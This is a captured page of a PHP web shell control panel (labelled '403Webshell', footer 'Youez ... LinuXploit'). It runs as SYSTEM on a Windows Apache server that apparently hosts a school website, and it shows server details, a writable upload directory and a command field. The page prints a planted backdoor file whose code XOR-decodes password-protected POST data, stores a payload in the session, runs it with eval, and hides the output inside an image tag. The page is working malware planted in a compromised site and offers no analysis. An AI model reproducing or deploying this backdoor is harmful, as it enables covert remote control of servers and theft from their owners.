403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/ratana/2568/adminicon/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/myschool/ratana/2568/adminicon/1692266411_123.php
<?php

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D, $K){
    for ($i = 0; $i < strlen($D); $i++) {
        $c = $K[$i + 1 & 15];
        $D[$i] = $D[$i] ^ $c;
    }
    return $D;
}
class C{public function __construct($p) {eval($p."");}}

$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';

if (isset($_POST[$pass])) {
    foreach ($_POST as $k => $v) {
        $_POST[$k] = pack("H*", $v);
    }
    $data = encode($_POST[$pass], $key);
    if (isset($_SESSION[$payloadName])) {
        $payload = encode($_SESSION[$payloadName], $key);

        if (strpos($payload, "getBasicsInfo") === false) {
            $payload = encode($payload, $key);
        }
        @new C($payload);
        echo encode($_POST['preffix'], $key);
        echo "<img src=\"data:image/x-icon;base64,".bin2hex(encode(@run($data), $key))."\"/>";
        echo encode($_POST['suffix'], $key);
    } else {
        if (strpos($data, "getBasicsInfo") !== false) {
            $_SESSION[$payloadName] = encode($data, $key);
        }
    }
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit